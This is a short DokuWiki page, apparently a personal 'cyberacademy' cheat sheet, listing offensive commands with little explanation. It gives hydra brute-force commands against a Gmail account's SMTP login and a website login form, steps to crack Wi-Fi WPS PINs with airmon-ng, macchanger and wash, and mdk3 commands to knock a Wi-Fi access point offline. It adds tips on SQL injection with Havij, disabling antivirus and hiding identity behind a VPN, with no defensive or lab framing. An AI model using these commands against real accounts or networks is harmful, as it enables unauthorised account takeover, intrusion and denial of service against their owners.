User Tools

Site Tools


dardan:cyberacademy:tools
##Cracking GMAIL Account
hydra -S -l email@gmail.com -P /wordlist/list.txt -e ns -V -s 465 smtp.gmail.com smtp
##Cracking WebSite
hydra www.sitename.com -L /userlist/list.txt -P /passwordlist/list.txt -V -f http-get /loginpage
##Crack WPS AP WiFi 
airmon-ng             ##to learn adapter name
airmon-ng start wlan0 ##created int. now is mon0
ifconfig mon0 down    ##disable int.
macchanger -a mon0    ##change mac address
ifconfig mon0 up      ##enable int.
wash -i mon0          ## select AP with WPS enabled , ESSID and BSSID
river -i mon0 -c 6 -essid -b bssid -vv ## it can takes hours, result wps pin: wpa psk: ap ssid:
## SQL injection - Havij
##google dorks
##use shadow defender or deep freez
##you have to disable antivirus
##use VPN to hide identity  (ex. HMA VPN Pro)
## dsploit, android tool
http://goo.gl/AMq2iT
##DoS on WiFi AP
ifconfig    ##int. name
iwlist wlan0 scan ## find essid, bssid, channel nr
echo bssid > blacklist
airmon-ng start wlan0
mdk3 mon0 d -b blacklist -c 6
mdk3 mon0 a -m -i bssid
apt-get install virtualbox dkms
dardan/cyberacademy/tools.txt · Last modified: 2018/10/31 18:56 by dardan

Donate Powered by PHP Valid HTML5 Valid CSS Driven by DokuWiki